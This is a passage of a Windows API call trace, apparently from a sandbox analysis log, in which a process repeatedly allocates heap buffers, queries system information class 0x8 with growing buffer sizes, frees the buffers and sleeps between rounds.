[0205.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.458] Sleep (dwMilliseconds=0x110) [0205.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.473] Sleep (dwMilliseconds=0x110) [0205.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.492] Sleep (dwMilliseconds=0x110) [0205.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.497] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.501] Sleep (dwMilliseconds=0x110) [0205.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.520] Sleep (dwMilliseconds=0x110) [0205.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.536] Sleep (dwMilliseconds=0x110) [0205.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.551] Sleep (dwMilliseconds=0x110) [0205.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.569] Sleep (dwMilliseconds=0x110) [0205.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.583] Sleep (dwMilliseconds=0x110) [0205.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.591] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.594] Sleep (dwMilliseconds=0x110) [0205.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.615] Sleep (dwMilliseconds=0x110) [0205.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.626] Sleep (dwMilliseconds=0x110) [0205.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.643] Sleep (dwMilliseconds=0x110) [0205.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.659] 